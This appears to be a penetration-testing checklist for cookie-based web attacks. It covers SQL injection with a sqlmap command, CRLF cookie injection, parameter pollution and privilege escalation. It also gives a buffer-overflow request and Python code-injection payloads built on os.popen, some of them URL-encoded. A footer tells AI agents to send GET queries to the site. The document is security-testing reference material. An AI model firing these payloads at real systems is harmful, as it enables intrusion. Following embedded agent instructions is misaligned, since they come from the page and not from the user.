# Cookie Based Attacks > Checklist * [ ] sensetive Data Stored in Cookies ``` check if anf pii or other sensitive infromation stored in cookies this in fromation usually includes : email,sessionID, data of birth ,mobile address ,ssn ,etc. ``` * [ ] cookie length violation\ leads to Buffer Overflow : A cookie length which is longer than profiled length can indicate that a buffer overflow attack attempt takes place. In a buffer overflow attack, the attacker will have to send very long strings that will generate the overflow, all of them generating this Violation. ``` GET  /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a ``` * [ ] Arbitrary Cookie injection ``` try injecting some arbitrary cookies using attack such as CRLF injection ,some times it can be used to escalate privilege or if the application malfunction, it can reveal sensitive infromation through stack traces ``` * [ ] Mass Assignment ``` similar to the parameter poolution, however in this , attacker tried to inject multiple user ID in same user_id parameter ``` * [ ] Danail of service - cookie Bomb ``` forcing the server to process cookies larger than the resricted cookie size defined by the server may cause danial of service attackAfter input "xxxxxxxxxxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerableReferences: [Hackerone #105363]() ``` * [ ] SQL injection ``` How to inject the code in Cookies?There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. Then the tester can introduce his malicious SQL statement in the cookie field.It’s like a get/post based SQL Injection, except that certain characters can’t be used. For example, ‘**;**‘ and ‘**,**‘ are typically treated as delimiters, so they end the injection if they aren’t URL-encoded.Cookie : sessionId=xxxbad1fdc’ order by 1# (Normal)_Cookie : sessionId=xxxbad1fdc’ order by 2# (Error)_after error sqlmap -u "" --cookie="" -p "" --dbs ``` * [ ] parameter pollution ``` 1. Assume that cookie utilize a parameter called **user_id=** to rerieve some data2. however , the application is not vulnerability to idor and change **user_id** to victim value dosnt help you3.attacker ,add an addition another **user_id=** parameter value to rhe cookie with vuctim user ID LIke: **user_id=atacker&user_id=victim**4. Three things can happen here:- the application may retrieve data of victim data- the application may retrieve data of victim data and attacker data- the application is not retrieve data it is not vulnerability ``` * [ ] Authentication Bybass (cookie are not avalid) ``` try accessing a protected resource by removing cookies ``` * [ ] xss ``` assume that the value of the cookie parameter "name" is reflected in the applicationchange the "name" value to "xss payload" ``` * [ ] Insufficient session management ``` 1. session doesnt expire on logout2. long session expirey3. session doesnt expire on password reset /change4. concurrent session ``` * [ ] privilege escalation * [ ] horizontal ``` 1.assume that the application uses mult-organization models2.cookie are used wich organized user can access3.alter the cookie in order to access some other application ``` * vertical ``` 1.assume the cookie are used to determine the role of the user2.alter the cookie in order to elevate the role of the user ``` * similarly ``` 1.try if the flower users cookies can be used to access higher users function2.try if the cookie of organization 1 user van be used to access function of organizaion 2 ``` * [ ] sesion puzzing ``` when an application utilzes the same session variable for multiple purposes , this can abused by an attacker to trick the application and perform the action as an authenticated or privileged user ``` * [ ] Exploiting Python Code Injection\ this payload in cookie or contenttype or path or parameter ``` eval(compile('for x in range(1):\\n import time\\n time.sleep(20)','a','single')) ``` * [ ] OS command injection ``` **eval(compile("""for x in range(1):\\\\n import os\\\\n os.popen(r'COMMAND').read()""",'','single'))** ``` ``` eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single')) ``` ``` **__import__('os').popen('COMMAND').read()** ``` * [ ] URL encode some characters ``` param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29 ``` ``` param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29 ``` ``` param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29 ``` ``` param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29 ``` Example with one expression ``` __import__('os').popen('COMMAND').read() ``` Example with multiple expressions, separated by commas ``` str("-"*50),__import__('os').popen('COMMAND').read() ``` * [ ] Insecure Deserialization ``` if cookis are using serialized Objects ,try performing insecure Deserialization Checks. portswigger laps ``` * [ ] Electronic Code Book * [ ] Pickle Code Execution * [ ] Cipher block chaining * [ ] file inclusion * [ ] IDOR * [ ] session fixation * [ ] padding oracle attack * [ ] JWT attack --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sallam.gitbook.io/sec-88/web-appsec/cookie-based-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.